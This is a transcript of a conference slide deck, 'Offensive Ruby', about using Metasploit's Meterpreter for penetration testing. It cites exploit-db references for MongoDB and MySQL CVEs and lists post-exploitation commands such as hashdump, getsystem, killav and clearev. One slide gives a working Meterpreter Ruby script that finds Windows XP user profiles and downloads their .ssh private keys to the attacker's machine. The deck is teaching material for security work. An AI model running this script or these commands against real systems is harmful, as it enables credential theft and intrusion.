Offensive Ruby

Transcript

1. Offensive Ruby Ausmarton Zarino Fernandes Developer/Consultant @ausmarton

2. Vulnerability (CVE-2013-1892): Specially crafted calls to the nativeHelper function in

   SpiderMonkey in MongoDB, could be used to exploit. Affects: • MongoDB < 2.0.9 and 2.2.x < 2.2.4 • x86 Linux Exploit Ref: www.exploit-db.com/exploits/24935/ Offensive Ruby: Exploiting MongoDB/Ubuntu

3. • Payload (not an exploit) • In-memory DLL injection •

   Dynamically extensible • Client supports many languages Offensive Ruby: Meterpreter

4. Offensive Ruby: Meterpreter Victim Metasploit Framework Exploit + Payload (Stage

   1) Target Process Remote code execution Connect back to MSF DLL Injection Payload (Stage 2) Meterpreter Server DLL Meterpreter Server Meterpreter Client TLS/1.0 with TLV Encrypted communication between Meterpreter Client and Server IRB Shell PHP Shell

5. • Core irb, migrate, sessions, background • Stdapi mkdir, ifconfig,

   route, shell, clearev, screenshot • Priv getsystem, hashdump Offensive Ruby: Meterpreter Commands

6. Scripts provide more features and can be used with “run”

   • checkvm • killav • hostedit • winenum Offensive Ruby: Bundled Scripts

7. Vulnerability (CVE-2012-5613): FILE privilege misconfiguration in MySQL can be exploited

   on Windows with the use of an MOF file Affects(Tested on): • MySQL 5.0.45 • Windows XP SP3 Exploit Ref: www.exploit-db.com/exploits/23179/ Offensive Ruby: Exploiting MySQL/Windows

8. • client client.sys.config client.sys.process client.net.config • Create your <script>.rb in

   /usr/share/metasploit-framework/scripts/meterpreter • “run <script>” from meterpreter Offensive Ruby: Custom Scripts

9. def profile_path(profiles_reg_key, sid) sys_drive_var = "%SystemDrive%" system_drive = client.fs.file.expand_path(sys_drive_var).to_s registry_getvaldata(profiles_reg_key

   + "\\" + sid,"ProfileImagePath") .gsub!(/\0/,'').sub(sys_drive_var, system_drive) end if client.sys.config.sysinfo['OS'].include? "Windows XP" then print_status "Windows XP found, trying to get user list" profiles_reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList" registry_enumkeys(profiles_reg_key).flatten.each do |sid| path = profile_path(profiles_reg_key, sid) unless path.include? "systemprofile" ssh_keys_dir = path + "\\.ssh" if client.fs.file.exists? ssh_keys_dir print_status "Downloading ssh keys from #{ssh_keys_dir}" client.fs.dir.download("/tmp/", "#{ssh_keys_dir}") end end end else print_error "Victim is not running Windows XP, giving up!" end Offensive Ruby: Fetching contents of .ssh

10. • www.offensive-security.com/metasploit-unleashed • www.github.com/rapid7/meterpreter • www.exploit-db.com • Harmony Security's paper

    on Reflective DLL Injection Offensive Ruby: References